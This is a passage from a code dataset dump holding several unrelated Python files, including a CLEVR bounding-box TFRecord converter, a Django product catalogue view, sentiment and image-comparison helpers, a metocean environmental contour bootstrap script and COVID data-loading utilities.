audio_pred\n","sub_path":"timbre_conditioned_vae/sound_generator.py","file_name":"sound_generator.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"616064090","text":"'''\n Copyright 2017 Larry Chen\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n'''\n\nimport os\nimport sys\nimport argparse\nimport collections\nimport json\nimport re\nimport time\n\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\n\nflags = tf.app.flags\nflags.DEFINE_string('image_dir', '', 'Path to CLEVR image directory')\nflags.DEFINE_string('scene_file', '', 'Path to CLEVR scene file')\nflags.DEFINE_string('output_path', '', 'Path to output TFRecord')\nFLAGS = flags.FLAGS\n\n\ndef generate_label_map():\n sizes = ['large', 'small']\n colors = ['gray', 'red', 'blue', 'green', 'brown', 'purple', 'cyan', 'yellow']\n materials = ['rubber', 'metal']\n shapes = ['cube', 'sphere', 'cylinder']\n\n names = [s + ' ' + c + ' ' + m + ' ' + sh for s in sizes for c in colors for m in materials for sh in shapes]\n\n with open(os.path.join(FLAGS.output_path, 'clevr_label_map.pbtxt'), 'w') as f:\n [f.write('item {\\n id: %d\\n name: \\'%s\\'\\n}\\n\\n' %(i+1, name)) for i, name in enumerate(names)]\n f.close()\n\n return names\n\n\ndef extract_bounding_boxes(scene, names):\n objs = 
scene['objects']\n rotation = scene['directions']['right']\n\n num_boxes = len(objs)\n\n boxes = np.zeros((1, num_boxes, 4))\n\n xmin = []\n ymin = []\n xmax = []\n ymax = []\n classes = []\n classes_text = []\n\n for i, obj in enumerate(objs):\n [x, y, z] = obj['pixel_coords']\n\n [x1, y1, z1] = obj['3d_coords']\n\n cos_theta, sin_theta, _ = rotation\n\n # Rotate into the camera frame; assign simultaneously so the already-rotated x1 is not reused when computing y1.\n x1, y1 = x1 * cos_theta + y1 * sin_theta, x1 * -sin_theta + y1 * cos_theta\n\n\n height_d = 6.9 * z1 * (15 - y1) / 2.0\n height_u = height_d\n width_l = height_d\n width_r = height_d\n\n if obj['shape'] == 'cylinder':\n d = 9.4 + y1\n h = 6.4\n s = z1\n\n height_u *= (s*(h/d + 1)) / ((s*(h/d + 1)) - (s*(h-s)/d))\n height_d = height_u * (h-s+d)/ (h + s + d)\n\n width_l *= 11/(10 + y1)\n width_r = width_l\n\n if obj['shape'] == 'cube':\n height_u *= 1.3 * 10 / (10 + y1)\n height_d = height_u\n width_l = height_u\n width_r = height_u\n \n obj_name = obj['size'] + ' ' + obj['color'] + ' ' + obj['material'] + ' ' + obj['shape']\n classes_text.append(obj_name.encode('utf8'))\n classes.append(names.index(obj_name) + 1)\n ymin.append((y - height_d)/320.0)\n ymax.append((y + height_u)/320.0)\n xmin.append((x - width_l)/480.0)\n xmax.append((x + width_r)/480.0)\n\n return xmin, ymin, xmax, ymax, classes, classes_text\n\n\ndef file_to_example_dict(scene_file, names):\n with open(scene_file) as sf:\n scene_data = json.load(sf)\n scenes = scene_data['scenes']\n\n examples = []\n\n for scene in scenes:\n xmins, ymins, xmaxs, ymaxs, classes, classes_text = extract_bounding_boxes(scene, names)\n\n example = {\n 'xmins': xmins,\n 'ymins': ymins,\n 'xmaxs': xmaxs,\n 'ymaxs': ymaxs,\n 'classes': classes,\n 'classes_text': classes_text,\n 'filename': scene['image_filename']\n }\n examples.append(example)\n\n return examples\n\n\ndef create_tf_example(example, image_dir):\n # TODO(user): Populate the following variables from your example.\n img_path = os.path.join(image_dir, example['filename'])\n with tf.gfile.GFile(img_path, 'rb') as fid:\n encoded_png = fid.read()\n\n height = 320\n width = 480\n filename = example['filename']\n image_format = 'png'\n\n xmins = example['xmins']\n xmaxs = example['xmaxs']\n ymins = example['ymins']\n ymaxs = example['ymaxs']\n\n classes_text = example['classes_text']\n classes = example['classes']\n\n tf_example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),\n 'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),\n 'image/filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[filename.encode('utf8')])),\n 'image/source_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[filename.encode('utf8')])),\n 'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[encoded_png])),\n 'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_format.encode('utf8')])),\n 'image/object/bbox/xmin': tf.train.Feature(float_list=tf.train.FloatList(value=xmins)),\n 'image/object/bbox/xmax': tf.train.Feature(float_list=tf.train.FloatList(value=xmaxs)),\n 'image/object/bbox/ymin': tf.train.Feature(float_list=tf.train.FloatList(value=ymins)),\n 'image/object/bbox/ymax': tf.train.Feature(float_list=tf.train.FloatList(value=ymaxs)),\n 'image/object/class/text': tf.train.Feature(bytes_list=tf.train.BytesList(value=classes_text)),\n 'image/object/class/label': tf.train.Feature(int64_list=tf.train.Int64List(value=classes))\n }))\n\n return tf_example\n\ndef write_tf_examples(names):
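\n \"\"\"Write every parsed scene example into a single TFRecord file, printing progress every 100 images.\"\"\"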
\n examples = file_to_example_dict(FLAGS.scene_file, names)\n\n writer = tf.python_io.TFRecordWriter(os.path.join(FLAGS.output_path, 'clevr_object_detect.tfrecord'))\n\n for i, example in enumerate(examples):\n tf_example = create_tf_example(example, FLAGS.image_dir)\n if i % 100 == 0:\n print('\\rOn image %d of %d' %(i, len(examples)), end='')\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\ndef main(_):\n names = generate_label_map()\n write_tf_examples(names)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"215610405","text":"#This script runs vader sentiment analysis on string passed as 'text'\nimport pandas as pd\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\nnltk.download('vader_lexicon')\n\n\ndef analyze_text(text):\n\n sid = SentimentIntensityAnalyzer()\n\n filtered_text = text.strip('./')\n print(filtered_text)\n text_results = {}\n ss = sid.polarity_scores(filtered_text)\n text_results['negative'] = ss['neg']\n text_results['neutral'] = ss['neu']\n text_results['positive'] = ss['pos']\n text_results['polarity'] = ss['compound']\n\n return (text_results)\n\n\n\n\n","sub_path":"app/vadar_function.py","file_name":"vadar_function.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"186867823","text":"from django.contrib import messages\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpRequest, Http404\nfrom django.urls import reverse\nfrom main.models_addon.ya_market import Offer\nfrom main.modules.base import BaseView\nfrom main.modules.offers.addition.save_yandex import push_offer_to_ym, push_offer_price_to_ym\nfrom main.view import Navbar, Page, Filtration, FilterCollection\nfrom main.ya_requests import OfferList, OfferPrice\nimport re\n\n\nclass CatalogueView(BaseView):\n context = {'title': 'Каталог товаров', 'page_name': 'Каталог товаров'}\n models_to_save = [OfferList, OfferPrice]\n fields = ['name', 'shopSku', 'category', 'vendor']\n table = ['', 'Название', 'SKU', 'Категория', 'Продавец']\n\n filtration = Filtration([\n FilterCollection(display_name='Торговая марка', filter_name='vendor'),\n FilterCollection(display_name='Категория', filter_name='category'),\n FilterCollection(display_name='Планы по поставкам', enum='availability'),\n ])\n\n content_types = {\n 'Весь список': Q(),\n 'Прошли модерацию': Q(processingState__status='READY'),\n 'На модерации': Q(processingState__status='IN_WORK'),\n 'Не прошли модерацию': Q(processingState__status__in=['NEED_CONTENT', 'NEED_INFO', 'REJECTED', 'SUSPENDED',\n 'OTHER']),\n 'Изменены локально': Q(processingState__isnull=False) & (Q(has_changed=True) | Q(price__has_changed=True)),\n 'Созданы локально': Q(processingState__isnull=True),\n 'Не рентабельные': None,\n }\n\n def find_offers_id_by_regular(self, request, regular_string=r'form-checkbox:'):\n \"\"\"Return the offers whose checkboxes were ticked in the submitted form.\"\"\"\n offers_ids = [re.sub(regular_string, '', line) for line in list(dict(request.POST).keys())[1:-1]]\n return self.configure_offer().filter(id__in=offers_ids)\n\n def push_price(self, offers):\n \"\"\"Handle a request to push changed prices to Yandex.\"\"\"
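\n # Only prices flagged as changed locally are sent; the sku_list still covers every offer passed in.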
\n prices = [offer.get_price for offer in offers if offer.price.has_changed]\n push_offer_price_to_ym(request=self.request, prices=prices, sku_list=offers.values_list('shopSku', flat=True),\n success_msg=\"Все цены на товары успешно отправлены\")\n\n def push_offer(self, offers):\n \"\"\"Handle a request to create or update offers on Yandex.\"\"\"\n push_offer_to_ym(request=self.request, offers=offers.filter(has_changed=True),\n sku_list=offers.values_list('shopSku', flat=True),\n success_msg=\"Все товары успешно отправлены\")\n\n def button_push(self):\n offers = self.find_offers_id_by_regular(self.request)\n if not offers:\n offers = self.configure_offer()\n self.push_offer(offers=offers)\n self.push_price(offers=offers)\n return redirect(reverse('catalogue_offer'))\n\n def check_box(self):\n [offer.delete() for offer in self.find_offers_id_by_regular(self.request)]\n return redirect(reverse('catalogue_offer'))\n\n def post(self, request: HttpRequest) -> HttpResponse:\n self.request = request\n data = {\n 'button_loader': lambda: self.save_models(request=request, name='catalogue_offer'),\n 'button_push': self.button_push,\n 'checkbox': self.check_box,\n }\n for key in data.keys():\n if key in request.POST:\n return data[key]()\n return redirect(reverse('catalogue_offer'))\n\n def configure_offer(self):\n \"\"\"Return the offers that match the currently selected status.\"\"\"\n if self.category_index == 'Не рентабельные':\n return [offer for offer in Offer.objects.filter(user=self.request.user).select_related('price')\n if offer.check_rent]\n return Offer.objects.filter(Q(user=self.request.user) & self.content_types[self.category_index])\n\n def get(self, request: HttpRequest) -> HttpResponse:\n self.request = request\n self.category_index = request.GET.get('content', 'Весь список')\n if self.category_index not in self.content_types:\n messages.success(self.request, f'Каталог {self.category_index.lower()} пуст')\n return redirect(reverse('catalogue_offer'))\n offers = self.configure_offer()\n if not offers and self.category_index != 'Весь список':\n messages.success(self.request, f'Каталог {self.category_index.lower()} пуст')\n return redirect(reverse('catalogue_offer'))\n filter_types = self.filtration.get_filter_types(offers)\n local_context = {\n 'navbar': Navbar(request).get(),\n 'table': self.table,\n 'filter_types': filter_types,\n 'current_type': self.category_index,\n 'types': self.content_types,\n 'offers': self.sort_object(offers, filter_types),\n }\n self.context_update(local_context)\n return render(request, Page.catalogue, self.context)\n","sub_path":"main/modules/offers/catalogue.py","file_name":"catalogue.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"416285641","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\nfrom django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.post_list, name='post_list'),\n url(r'^post/(?P<pk>\\d+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P<pk>\\d+)/edit/$', views.post_edit, name='post_edit'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"520790279","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\n# pyre-unsafe\n\nimport unittest\nfrom unittest.mock import MagicMock, mock_open, patch\n\nfrom ... import commands # noqa\nfrom ...analysis_directory import AnalysisDirectory\nfrom ..color import CoverageLevel, TypeAnnotation\nfrom .command_test import mock_arguments, mock_configuration\n\n\nclass ColorTest(unittest.TestCase):\n @patch(\"builtins.open\")\n @patch(\"sys.exit\")\n def test_query(self, sys, open_mock) -> None:\n arguments = mock_arguments()\n configuration = mock_configuration()\n original_directory = \"/original/directory\"\n open_mock.return_value = mock_open(\n read_data=\"\"\"\n def foo() -> int:\n pass\n \"\"\"\n ).return_value\n with patch.object(commands.Command, \"_call_client\") as call_client:\n result = MagicMock()\n result.output = '{\"response\": {\"types\": []}}'\n call_client.return_value = result\n arguments.file = \"\"\n commands.Color(\n arguments, original_directory, configuration, AnalysisDirectory(\".\")\n ).run()\n call_client.assert_called_once_with(command=commands.Query.NAME)\n\n def test_type_annotations(self) -> None:\n json_example = {\n \"location\": {\n \"path\": \"a/b.py\",\n \"start\": {\"line\": 6, \"column\": 8},\n \"stop\": {\"line\": 6, \"column\": 9},\n },\n \"coverage\": [\"Partial\"],\n }\n annotation = TypeAnnotation.create_from_json(json_example)\n self.assertEqual(annotation.start_line, 6)\n self.assertEqual(annotation.stop_line, 6)\n self.assertEqual(annotation.start_column, 8)\n self.assertEqual(annotation.stop_column, 9)\n self.assertEqual(annotation.coverage, CoverageLevel.PARTIAL)\n","sub_path":"client/commands/tests/color_test.py","file_name":"color_test.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"582757268","text":"@staticmethod\ndef images_equal(path1, path2):\n from PIL import Image, ImageChops\n from io import BytesIO\n bucket_name = os.environ.get('BUCKET_NAME', app_identity.get_default_gcs_bucket_name())\n bucket = '/' + bucket_name\n retryParameters = gcs.RetryParams(initial_delay=0.2,\n max_delay=5.0,\n backoff_factor=2,\n max_retry_period=15,\n urlfetch_timeout=30)\n\n path1 = bucket + path1\n path2 = bucket + path2\n\n f1 = gcs.open(path1, 'r', retry_params=retryParameters)\n f2 = gcs.open(path2, 'r', retry_params=retryParameters)\n img_bytes1 = BytesIO(f1.read())\n img_bytes2 = BytesIO(f2.read())\n im1 = Image.open(img_bytes1)\n im2 = Image.open(img_bytes2)\n\n diff = ImageChops.difference(im1, im2).getbbox()\n\n f1.close()\n f2.close()\n img_bytes1.close()\n img_bytes2.close()\n\n return (diff is None)\n\n","sub_path":"classes/Helpers_/images_equal.py","file_name":"images_equal.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"56018915","text":"#!/usr/bin/env 
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 5 16:13:16 2020\n\n@author: astah\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom viroconcom.fitting import Fit\nfrom viroconcom.contours import IFormContour\nfrom plot import plot_contour, PlottedSample, plot_confidence_interval\nfrom read_write import read_dataset, determine_file_name_e2, write_contour, read_contour\nfrom contour_intersection import contour_intersection\nfrom contour_statistics import thetastar_to_theta\nfrom scipy.stats import norm, weibull_min, chi2\nfrom scipy.optimize import curve_fit\n\n# Define the number of years of data that one bootstrap sample should contain.\n# In the exercise, 1, 5 and 25 years are used.\nNR_OF_YEARS_TO_DRAW = 25\n\nDO_COMPUTE_CONFIDENCE_INTERVAL = True\nNR_OF_BOOTSTRAP_SAMPLES = 1000 # Must be 1000 in Exercise 2.\nBOTTOM_PERCENTILE = 2.5 # Must be 2.5 in Exercise 2.\nUPPER_PERCENTILE = 97.5 # Must be 97.5 in Exercise 2.\nANGLE_STEP_FOR_CI = 2 # Must be 2 in Exercise 2.\n\nDO_PLOT_ANGLE_LINES = False # Must be False in Exercise 2. For visualization.\nNR_OF_POINTS_ON_CONTOUR = 200 # For IFORM contours it can be set explicitly.\n\n# Read dataset D.\nfile_path = '../datasets/D.txt'\ndataset_d_v, dataset_d_hs, label_v, label_hs = read_dataset(file_path)\n\n# Define the origin (will be used to compute confidence intervals).\nv0 = np.mean(dataset_d_v)\nhs0 = np.mean(dataset_d_hs)\n#print('Origin:')\n#print(v0)\n#print(hs0)\n\nnr_of_datapoints_to_draw = int(NR_OF_YEARS_TO_DRAW * 365.25 * 24)\nreturn_period = 50\np_r = 1/int(return_period*365.25*24)\n#np.random.seed(9001)\nbin_size = 0.5\nbounds = ([0,0,0],[np.inf, np.inf, np.inf])\nphi = np.linspace(0, 2 * np.pi, NR_OF_POINTS_ON_CONTOUR)\nbeta50 = np.sqrt(chi2.ppf(1-p_r, df=2))\nu0_50 = beta50*np.cos(phi)\nu1_50 = beta50*np.sin(phi)\n\ntheta_v_ij = np.zeros(shape=(NR_OF_BOOTSTRAP_SAMPLES, int(360/ANGLE_STEP_FOR_CI)))\ntheta_hs_ij = np.zeros(shape=(NR_OF_BOOTSTRAP_SAMPLES, int(360/ANGLE_STEP_FOR_CI)))\n\n\ndef power3(x, a, b, c):\n return a + b * x ** c\n\nfor i in range(NR_OF_BOOTSTRAP_SAMPLES):\n # Resample from the hindcast dataset to get the sample D_i.\n sample_indices = np.random.randint(dataset_d_v.size, size=nr_of_datapoints_to_draw)\n v_i = np.take(dataset_d_v, sample_indices)\n hs_i = np.take(dataset_d_hs, sample_indices)\n # Fit Weibull to Hs:\n weib_par2 = weibull_min.fit(hs_i, loc=0)\n # Find the conditional Weibull for V:\n h_min = hs_i.min()\n h_max = hs_i.max()\n\n h_bins = np.arange(np.floor(h_min), np.ceil(h_max), bin_size) + bin_size/2\n h_binedges = h_bins + bin_size/2\n\n h_ind_bin = np.digitize(hs_i, bins=h_binedges)\n unique, counts = np.unique(h_ind_bin, return_counts=True)\n\n ind_min_bin = unique[counts>10][0]\n ind_max_bin = unique[counts>10][-1]\n x_bins = h_bins[ind_min_bin:ind_max_bin+1]\n real_bins = np.zeros(len(x_bins))\n\n weib_par_cond = np.zeros((len(x_bins),3))\n\n for j in range(len(x_bins)):\n mask1 = h_ind_bin == j + ind_min_bin\n real_bins[j] = hs_i[mask1].mean()\n weib_par_cond[j,:] = weibull_min.fit(v_i[mask1], floc=0)\n try:\n k = curve_fit(power3, real_bins, weib_par_cond[:,0], bounds=bounds)[0]\n a = curve_fit(power3, real_bins, weib_par_cond[:,2], bounds=bounds)[0]\n except RuntimeError: \n try:\n k = curve_fit(power3, real_bins[0:-1], weib_par_cond[0:-1,0], bounds=bounds)[0]\n a = curve_fit(power3, real_bins[0:-1], weib_par_cond[0:-1,2], bounds=bounds)[0]\n except RuntimeError: \n k = curve_fit(power3, real_bins[0:-2], weib_par_cond[0:-2,0], bounds=bounds)[0]\n a = 
curve_fit(power3, real_bins[0:-2], weib_par_cond[0:-2,2], bounds=bounds)[0]\n\n x1_50 = weibull_min.ppf( norm.cdf(u1_50), *weib_par2)\n\n # The weibull conditional distribution\n k_x1_50 = power3(x1_50, *k)\n a_x1_50 = power3(x1_50, *a)\n\n x0_50 = weibull_min.ppf( norm.cdf(u0_50), k_x1_50, loc=0, scale=a_x1_50)\n\n# import seaborn as sns\n# h = sns.jointplot(x= v_i , y=hs_i, s=5)\n# h.x, h.y = x0_50, x1_50\n# h.plot_joint(plt.plot, color='C1')\n \n# ids_contour_i = []\n # Compute 50-yr IFORM contour.\n# iform_contour_i = IFormContour(my_fit.mul_var_dist, return_period, 1,\n# NR_OF_POINTS_ON_CONTOUR)\n \n if DO_COMPUTE_CONFIDENCE_INTERVAL:\n # Define angles based on normalization.\n theta_stars = np.arange(0, 360, ANGLE_STEP_FOR_CI) / 180 * np.pi\n t1 = max(dataset_d_v) - min(dataset_d_v)\n t2 = max(dataset_d_hs) - min(dataset_d_hs)\n #print('t1: ' + str(t1))\n #print('t2: ' + str(t2))\n thetas = thetastar_to_theta(theta_stars, t1, t2)\n #print('Thetas: ' + str(thetas / np.pi * 180))\n #print('Theta_stars: ' + str(theta_stars/np.pi * 180))\n nr_of_datapoints_on_angled_line = 10\n line_tot_length = 50.0\n line_length = np.linspace(0.0, line_tot_length, nr_of_datapoints_on_angled_line)\n\n # Compute lines that have an angle theta to the x-axis.\n theta_line_v = list()\n theta_line_hs = list()\n theta_v = list()\n theta_hs = list()\n for j, theta in enumerate(thetas):\n theta_line_v.append(np.multiply(np.cos(theta), line_length) + v0)\n theta_line_hs.append(np.multiply(np.sin(theta), line_length) + hs0)\n# c_v = np.append(x1_50, x1_50[0])\n# c_hs = np.append(x0_50, x0_50[0])\n theta_v_j, theta_hs_j = contour_intersection(\n theta_line_v[j], theta_line_hs[j], x0_50, x1_50, True)\n theta_v_ij[i,j] = theta_v_j\n theta_hs_ij[i,j] = theta_hs_j\n# theta_v.append(theta_v_j)\n# theta_hs.append(theta_hs_j)\n\n if i == 0:\n contour0, contour1 = [x0_50], [x1_50]\n else:\n contour0.append(x0_50)\n contour1.append(x1_50)\n \n# Plot the environmental contours.\nfig = plt.figure(figsize=(5, 5), dpi=150)\nax = fig.add_subplot(111)\nfor i in range(len(contour0)):\n if i == 0:\n plotted_sample = PlottedSample(x=np.asarray(dataset_d_v),\n y=np.asarray(dataset_d_hs),\n ax=ax,\n label='dataset D')\n contour_label = str(return_period) + '-yr contour'\n plot_contour(x=contour0[i],\n y=contour1[i],\n ax=ax,\n contour_label=contour_label,\n x_label=label_v,\n y_label=label_hs,\n line_style='b-',\n alpha=0.4,\n plotted_sample=plotted_sample)\n else:\n plot_contour(x=contour0[i],\n y=contour1[i],\n line_style='b-',\n alpha=0.4,\n ax=ax)\n if DO_COMPUTE_CONFIDENCE_INTERVAL and DO_PLOT_ANGLE_LINES:\n for j, (line_v, line_hs) in enumerate(zip(theta_line_v, theta_line_hs)):\n if i == 0:\n plt.plot(line_v, line_hs, 'r-')\n plt.plot(theta_v, theta_hs, 'gx')\nif NR_OF_YEARS_TO_DRAW == 1:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' year')\nelse:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' years')\nplt.xlim((0, 32))\nplt.ylim((0, 14))\nplt.show()\nplt.savefig('../results/figures/hannesdottir_asta_exercise2_'+ str(NR_OF_YEARS_TO_DRAW) +'yr_allcontours.png', dpi=300)\n\nif DO_COMPUTE_CONFIDENCE_INTERVAL:\n# theta_v_ij = np.zeros(shape=(len(contour0), thetas.size))\n# theta_hs_ij = np.zeros(shape=(len(contour0), thetas.size))\n distance_to_origin_ij = np.zeros(shape=(len(contour0), thetas.size))\n# for i, contour in enumerate(contours):\n for i in range(len(contour0)):\n for j in range(len(thetas)):\n# for j, (v_j, hs_j) in enumerate(zip(contour.theta_v, contour.theta_hs)):\n v_j = theta_v_ij[i, 
j]\n hs_j = theta_hs_ij[i, j]\n o = np.array([v0, hs0])\n p = np.array([v_j, hs_j]).flatten()\n op = p - o\n distance_to_origin_ij[i, j] = np.sqrt(op[0]*op[0] + op[1]*op[1])\n sorted_v = np.zeros(shape=(len(contour0), thetas.size))\n sorted_hs = np.zeros(shape=(len(contour0), thetas.size))\n for j in range(thetas.size):\n sorted_indices = np.argsort(distance_to_origin_ij[:, j])\n sorted_v[:, j] = theta_v_ij[sorted_indices, j]\n sorted_hs[:, j] = theta_hs_ij[sorted_indices, j]\n percentile50_index = int(round((NR_OF_BOOTSTRAP_SAMPLES - 1) * (50.0 / 100.0)))\n bottom_percentile_index = int(round((NR_OF_BOOTSTRAP_SAMPLES - 1) * (BOTTOM_PERCENTILE / 100.0)))\n upper_percentile_index = int(round((NR_OF_BOOTSTRAP_SAMPLES - 1) * (UPPER_PERCENTILE / 100.0)))\n\n # Save the median, bottom and upper percentile contours.\n folder_name = 'contour_coordinates/'\n file_name_median = determine_file_name_e2(\n 'Asta', 'Hannesdottir', NR_OF_YEARS_TO_DRAW, 'median')\n write_contour(sorted_v[percentile50_index, :],\n sorted_hs[percentile50_index, :],\n folder_name + file_name_median,\n label_x=label_v,\n label_y=label_hs)\n file_name_bottom = determine_file_name_e2(\n 'Asta', 'Hannesdottir', NR_OF_YEARS_TO_DRAW, 'bottom')\n write_contour(sorted_v[bottom_percentile_index, :],\n sorted_hs[bottom_percentile_index, :],\n folder_name + file_name_bottom,\n label_x=label_v,\n label_y=label_hs)\n file_name_upper = determine_file_name_e2(\n 'Asta', 'Hannesdottir', NR_OF_YEARS_TO_DRAW, 'upper')\n write_contour(sorted_v[upper_percentile_index, :],\n sorted_hs[upper_percentile_index, :],\n folder_name + file_name_upper,\n label_x=label_v,\n label_y=label_hs)\n\n # Read the contours from the csv files.\n (contour_v_median, contour_hs_median) = read_contour(folder_name + file_name_median)\n (contour_v_bottom, contour_hs_bottom) = read_contour(folder_name + file_name_bottom)\n (contour_v_upper, contour_hs_upper) = read_contour(folder_name + file_name_upper)\n\n # Plot the sample, the median contour and the confidence interval.\n fig = plt.figure(figsize=(5, 5), dpi=150)\n ax = fig.add_subplot(111)\n plotted_sample = PlottedSample(x=np.asarray(dataset_d_v),\n y=np.asarray(dataset_d_hs),\n ax=ax,\n label='dataset D')\n contour_labels = ['50th percentile contour', '2.5th percentile contour',\n '97.5th percentile contour']\n plot_confidence_interval(\n x_median=contour_v_median, y_median=contour_hs_median,\n x_bottom=contour_v_bottom, y_bottom=contour_hs_bottom,\n x_upper=contour_v_upper, y_upper=contour_hs_upper, ax=ax,\n x_label=label_v,\n y_label=label_hs, contour_labels=contour_labels,\n plotted_sample=plotted_sample)\n if NR_OF_YEARS_TO_DRAW == 1:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' year')\n else:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' years')\n plt.show()\n plt.savefig('../results/figures/hannesdottir_asta_exercise2_'+ str(NR_OF_YEARS_TO_DRAW) +'yr_confidenceintervals.png', dpi=300)\n","sub_path":"participants-code/contribution-3/e2_baseline_asta.py","file_name":"e2_baseline_asta.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"573175541","text":"import pandas as pd\nimport numpy as np\nimport featuretools as ft\nfrom collections import defaultdict\nfrom sklearn.metrics import roc_auc_score\nfrom featuretools.primitives import Count, Mean\nimport os\n\ndef get_country_df(): \n\n def p2f(x):\n \"\"\"\n Convert urban percentage to float\n \"\"\"\n try:\n return 
float(x.strip('%'))/100\n except:\n return np.nan\n\n def age2int(x):\n \"\"\"\n Convert Age to integer\n \"\"\"\n try:\n return int(x)\n except:\n return np.nan\n\n def fert2float(x):\n \"\"\"\n Convert Fertility Rate to float\n \"\"\"\n try:\n return float(x)\n except:\n return np.nan\n\n\n countries_df = pd.read_csv(\"./data/population_by_country_2020.csv\", converters={'Urban Pop %':p2f,\n 'Fert. Rate':fert2float,\n 'Med. Age':age2int})\n countries_df.rename(columns={'Country (or dependency)': 'country',\n 'Population (2020)' : 'population',\n 'Density (P/Km²)' : 'density',\n 'Fert. Rate' : 'fertility',\n 'Med. Age' : \"age\",\n 'Urban Pop %' : 'urban_percentage'}, inplace=True)\n\n\n\n countries_df['country'] = countries_df['country'].replace('United States', 'US')\n countries_df = countries_df[[\"country\", \"population\", \"density\", \"fertility\", \"age\", \"urban_percentage\"]]\n return countries_df\n\ndef get_weather_df():\n df_temperature = pd.read_csv('data/temperature_dataframe.csv')\n df_temperature['country'] = df_temperature['country'].replace('USA', 'US')\n df_temperature['country'] = df_temperature['country'].replace('UK', 'United Kingdom')\n df_temperature = df_temperature[[\"country\", \"province\", \"date\", \"humidity\", \"sunHour\", \"tempC\", \"windspeedKmph\"]].reset_index()\n df_temperature.rename(columns={'province': 'state'}, inplace=True)\n df_temperature[\"date\"] = pd.to_datetime(df_temperature['date'])\n df_temperature['state'] = df_temperature['state'].fillna('')\n\n return df_temperature\n\ndef get_icu_df():\n icu_df = pd.read_csv(\"./data/icu_bed.csv\")\n icu_df['Country Name'] = icu_df['Country Name'].replace('United States', 'US')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Russian Federation', 'Russia')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Iran, Islamic Rep.', 'Iran')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Egypt, Arab Rep.', 'Egypt')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Venezuela, RB', 'Venezuela')\n\n # We wish to have the most recent values, thus we need to go through every year and extract the most recent one, if it exists.\n icu_cleaned = pd.DataFrame()\n icu_cleaned[\"country\"] = icu_df[\"Country Name\"]\n icu_cleaned[\"icu\"] = np.nan\n\n for year in range(1960, 2020):\n year_df = icu_df[str(year)].dropna()\n icu_cleaned[\"icu\"].loc[year_df.index] = year_df.values\n return icu_cleaned\n\nimport matplotlib.pylab as plt\ndef show_feature_importance(X,forest):\n \"\"\"\n Creates a sorted list of the feature importance of a decision tree algorithm.\n Furthermore it plots it.\n params:\n forest: Decision Tree algorithm\n \"\"\"\n importances = forest.feature_importances_\n indices = np.argsort(importances)[::-1]\n\n # Print the feature ranking\n# print(\"Feature ranking:\")\n\n# for f in range(X.shape[1]):\n# print(\"{}, Feature: {}, Importance: {}\".format(f + 1, X.columns[indices[f]], importances[indices[f]]))\n\n # Plot the feature importances of the forest\n plt.figure(figsize=(10,5))\n plt.title(\"Feature importances\")\n plt.bar(range(X.shape[1]), importances[indices], color=\"r\", align=\"center\")\n plt.xticks(range(X.shape[1]), X.columns[indices], rotation='vertical')\n plt.xlim([-1, X.shape[1]])\n plt.show()","sub_path":"titanic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"449617074","text":"from . 
